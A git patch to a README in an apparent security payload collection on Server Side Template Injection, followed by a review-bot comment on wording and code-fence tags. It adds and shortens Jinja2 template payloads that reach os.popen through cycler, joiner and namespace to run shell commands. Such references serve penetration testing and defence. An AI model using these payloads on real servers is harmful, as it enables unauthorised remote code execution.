From b5699ecf08587131c506f7958f2fc5ee58631b08 Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sat, 18 Sep 2021 20:03:12 +0200 Subject: [PATCH] Update README.md --- Server Side Template Injection/README.md | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index d2df837..858eab6 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -503,14 +503,20 @@ These payloads are context-free, and do not require anything, except being in a ```python {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} -``` -```python {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} + +{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} ``` +We can use these shorter payloads (this is the shorter payloads known yet): + ```python -{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} +{{ cycler.__init__.__globals__.os.popen('id').read() }} + +{{ joiner.__init__.__globals__.os.popen('id').read() }} + +{{ namespace.__init__.__globals__.os.popen('id').read() }} ``` Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
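Review bot: the added sentence "We can use these shorter payloads (this is the shorter payloads known yet):" has a number-agreement error and reads awkwardly; suggest "These shorter payloads also work (the shortest known so far):". Two smaller points in the same hunk: the code fences are tagged as python, but the contents are Jinja2 template expressions, so a jinja tag (or an untagged fence) would be more accurate for readers and for syntax highlighting; and since the surrounding context line says these payloads are context-free, one line noting that `cycler`, `joiner` and `namespace` resolve because they are part of Jinja2's default environment globals would document why the shorter form needs no `self._TemplateReference__context` prefix, and would help defenders understand which template-engine defaults are being reached.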